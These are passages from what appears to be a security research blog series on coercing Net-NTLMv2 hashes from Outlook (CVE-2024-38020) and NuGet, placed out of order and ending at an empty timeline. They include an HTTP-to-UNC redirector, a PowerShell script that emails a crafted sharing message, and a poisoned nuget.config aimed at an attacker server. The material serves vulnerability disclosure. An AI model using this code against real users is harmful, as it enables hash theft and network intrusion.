As with previous testing, we found that Microsoft would frequently provide a warning dialog if you were about to do something fun and/or dangerous. In the case of the URI handlers, within a browser, there would be a prompt asking if you would like to open the selected Office program. This is expected behaviour, as the security boundary shifts from the browser to the program associated with the URI scheme. In the case of Microsoft Office products, this means that macros will not be loaded, and neither will external resources. These are security protections designed to prevent malicious exploits from happening within these programs.

However, after enumerating and testing various URI handler interactions within Outlook, it was found that by emailing a hyperlink with an Office URI handler, there would be no dialog prompt. The URI handler would immediately open whichever Office program was specified and attempt to fetch the resource at the specified URL. As with previous HTTP interactions, no Net-NTLMv2 authentication would take place over port 80. By applying a 302 redirect (as with the CVE-2023-35636 bypass) it was possible to redirect from port 80 (HTTP) to port 445 (SMB) and capture the Net-NTLMv2 hash. Again, a small Python script (as in the previous blog) was used to perform the redirection. These network interactions would happen before any document was loaded, bypassing the intended security controls in both the browser and the Office program.
tl;dr

In 2023, Varonis Labs discovered (https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes) that a Net-NTLMv2 hash could be obtained from a victim by tricking them into opening a calendar in Outlook. CVE-2023-35636 was issued and was subsequently fixed in December 2023. By leveraging a technique commonly used in SSRF (Server-Side Request Forgery), redirecting an HTTP request to a UNC path, we were able to bypass Microsoft's fix and obtain a Net-NTLMv2 hash. Microsoft patched this as part of the July 2024 Patch Tuesday and issued CVE-2024-38020 (https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-38020).

Introduction

This is part two of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, please see our first blog post in this series (https://www.privsec.nz/releases/nuget-package-manager).

Outlook

Outlook is Microsoft's email client, widely used throughout the world. It comes in multiple flavours and variants, from the Windows desktop client (classic) and the browser client, to the (new) desktop client which is built using WebView 2. Outlook allows for sharing and receiving emails, calendars, invitations, and other event and message types between users of different organisations.

Microsoft security controls

The security controls Microsoft implement for externally provided content often take the form of a warning dialog box, letting the user know that if they choose to interact with untrusted external content they may be about to do something dangerous or fun.

The vulnerability

The original CVE (CVE-2023-35636) leveraged two headers that can be included in an email and specified by the sender. Email headers are hidden parts of an email that can contain information about the sender and how the message is routed and authenticated. The following Outlook-specific headers were used:

Content-Class:
x-sharing-config-url:

When the value of `Content-Class` was set to "sharing", this instructed Outlook that the received message was for sharing content. When the `x-sharing-config-url` was set to a file URL or UNC path containing an ICS (calendar) file, Outlook would helpfully format the top of the email with a call to action for the user to add the calendar to their own. This vulnerability was a one-click, no-warning Net-NTLMv2 hash leaker, and was classed as Important and fixed in December 2023.

The initial fix

Microsoft added a warning dialog to any `x-sharing-config-url` that started with the `file://` handler, letting the user know that by clicking through they may be exposing themselves to risk.

Bypassing the fix

We noticed that Outlook was only popping up a dialog box for a UNC/file path link, and that HTTP connections were not given the same warnings. This was a reasonable assumption for the fix, as Windows generally doesn't send authentication on port 80/443 unless it is to a trusted location, such as an internal network. However, by reframing this problem as something more like an SSRF (Server-Side Request Forgery), we were able to apply a redirection technique and subsequently capture a Net-NTLMv2 hash on port 445.
Using a basic Python script, we would redirect any incoming web (HTTP) requests to a UNC path. This is a common technique in SSRF to bypass filter protections, or to turn a web-only SSRF into a file-read exploit, by forcing a protocol change from http:// to file://. The new flow can be roughly summarised as follows:

1. The victim receives an email with the sharing headers set, where `x-sharing-config-url` points at an attacker-controlled web server, and clicks the call to action.
2. Outlook fetches the configured URL over HTTP (port 80), which is permitted without a warning.
3. The attacker's web server responds with a 302 redirect to a UNC path.
4. Outlook follows the redirect to SMB (port 445) and authenticates, leaking the victim's Net-NTLMv2 hash.
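A minimal sketch of such a redirector (not the original script; the UNC target below is a hypothetical attacker SMB server) looks something like this:

```python
# Minimal sketch of an HTTP -> UNC redirector; not the original script.
# The UNC target below is a hypothetical attacker-controlled SMB server.
from http.server import BaseHTTPRequestHandler, HTTPServer

UNC_TARGET = "file://192.0.2.10/share/calendar.ics"

class Redirector(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        # Bounce every request to the UNC path, forcing the client to
        # switch protocols from HTTP to SMB.
        self.send_response(302)
        self.send_header("Location", UNC_TARGET)
        self.end_headers()

# Binding port 80 typically requires elevated privileges.
HTTPServer(("0.0.0.0", 80), Redirector).serve_forever()
```

An SMB capture tool, such as Responder, would then be listening on port 445 to collect the hash.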
Reproduction steps

To reproduce this issue, we created a PowerShell script that can be run on a Windows machine with Outlook installed. This issue was patched as part of the July 2024 Patch Tuesday, and CVE-2024-38020 was assigned.
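A close variant of the reproduction script shown earlier for the RSS issue works here, with the sharing URL pointed at the HTTP redirector; a sketch assuming that structure (the redirector address is hypothetical):

```powershell
# Sketch based on the near-identical RSS reproduction script, assuming the
# same approach; the redirector address below is hypothetical.
$outlook = New-Object -ComObject Outlook.Application
$mail = $outlook.CreateItem(0)
$mail.Subject = "Sharing Email with Custom Headers"
$mail.Recipients.Add("victim@example.com")
$mail.Body = "This is the body of the email."

# Point the sharing config at the attacker's HTTP redirector, which in turn
# 302-redirects Outlook to a UNC path.
$mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/x-sharing-config-url", "http://192.0.2.10/calendar.ics")
$mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/Content-Class", "Sharing")

$mail.Send()
```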
Disclosure timeline

17 April 2024: Reported to the MSRC
18 April 2024: Case opened by the MSRC
27 April 2024: Further reproduction steps provided, including the above PowerShell script
30 April 2024: MSRC confirms that they are able to reproduce
17 May 2024: MSRC confirms that this vulnerability is classed as Important and will be sent for immediate servicing
18 May 2024: MSRC downgrades this issue to a Moderate
09 July 2024: Patched as part of Patch Tuesday, CVE-2024-38020 assigned
tl;dr
Earlier versions of Nuget Package Manager shipping with Visual Studio on Windows would leak a Net-NTLMv2 hash on port 80. This would happen on the Nuget Restore operation, which happens as soon as a project is cloned from a Git repo or otherwise loaded. By poisoning a `nuget.config` file with the IP address of an attacker-controlled upstream repository, it would be possible to coerce or obtain the hashes of anyone cloning the repository.

Introduction

This is part one of a five-part blog post series focusing on NTLM-related research that was presented by two of our consultants, Tomais Williamson and Jim Rush, as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun forcing authentication and hashes out of a few more things before it fades into obscurity over the next twenty-five years or so.

So, what is NTLM?

NTLM stands for New Technology Lan Manager, and is the broad name given to the suite of protocols that have underpinned authentication within the Windows ecosystem for the last 30 or so years. In the context of this research, it's a password hash; a hash being the result of turning a cleartext password (Winter2024!) into a mangled version of itself for transmission over a network, to avoid sending the cleartext password. While it is possible to brute-force weak passwords against known wordlists, the act of hashing a cleartext string is like turning a cow into sausages – computationally expensive to get the cow back. However, in an internal Active Directory network, being able to coerce a password hash allows for a variety of relay attacks which do not involve cracking the password. These attacks can allow for user impersonation within an environment. While there are mitigations and steps administrators can take to help reduce this risk, NTLM relaying still presents an excellent way for a malicious actor to laterally move or otherwise pivot around a network. TrustedSec have a great and comprehensive blog post about the relaying attacks available: https://trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022

Now that we understand what an NTLM hash (or Net-NTLMv2 hash) is, and how useful it can be to coerce them, let's see what we can get them out of.

Nuget Package Manager

Nuget Package Manager (pronounced "New Get") is a package manager primarily used for packaging and distributing software written using .NET and the .NET Framework. Software packages are self-explanatory: reusable libraries of code that perform certain functions, which developers can import into their own projects to save writing their own.

How Nuget Stores Credentials

As you can imagine, Nuget has some clear documentation surrounding secure storage of credentials. Credentials are recommended to be stored encrypted, set using the `packageSourceCredentials` node in the `nuget.config` file. Passwords are encrypted by default and are intended to be specified on a per-repository basis, either directly from the command line or using environment variables. The documentation suggests that if a `packageSourceCredentials` node is not set or otherwise populated, Nuget should not pass credentials of any form to an upstream Nuget repository. However, as we discovered, it does.

Getting a hash out of Nuget

We reported the issue to the MSRC (Microsoft Security Response Center), who deal with MS-related vulnerabilities.
Stripped of the technical words used for the benefit of the MSRC, the bug is somewhat straightforward:

- When a project is cloned or loaded in Visual Studio, a Nuget Restore runs automatically and contacts the upstream package sources defined in the repository's `nuget.config`.
- That file can point at an arbitrary, attacker-controlled server.
- When the server responds to the restore request with a 401, Nuget retries the request using the current user's default Windows credentials, sending their Net-NTLMv2 hash to the server.
How this bug happened: ICredentials

While trying to figure out the root cause for MS of why Nuget was leaking credentials, we quickly came across the ICredentials interface. This interface within .NET "provides the base authentication interface for retrieving credentials for Web client authentication". It exposes the `GetCredential` method to objects that provide network credentials to applications, and is used extensively throughout the Nuget codebase to handle authentication. Within Nuget, there was a logic error that caused the package manager to retry a request after a 401 response, falling back to the current user's default credentials, and so passing their Net-NTLMv2 hash on the second attempt.

Example `nuget.config` file

The below is an example of a poisoned `nuget.config` file, which can be used to coerce the hashes of anyone cloning the repository in VS on Windows:
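A representative sketch follows (the attacker IP is hypothetical; the repository linked below contains the original):

```xml
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <packageSources>
    <!-- Remove the default nuget.org feed so the restore must contact our server -->
    <clear />
    <!-- Hypothetical attacker-controlled "upstream" repository -->
    <add key="internal-packages" value="http://192.0.2.10/nuget/index.json" />
  </packageSources>
</configuration>
```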
To reproduce this issue:

1. Commit a poisoned `nuget.config` to a repository.
2. Stand up a listener at the configured address that responds to the restore requests with a 401 (a capture tool such as Responder also works).
3. Clone the repository in Visual Studio on Windows; the automatic Nuget Restore will send the user's Net-NTLMv2 hash to the listener.
An example repository containing an example poisoned nuget.config file can be found here: https://github.com/JimSRush/NTLM_vanilla/blob/main/nuget.config

Hello, could I have 500 of my coworkers' hashes please?

Disclosure timeline: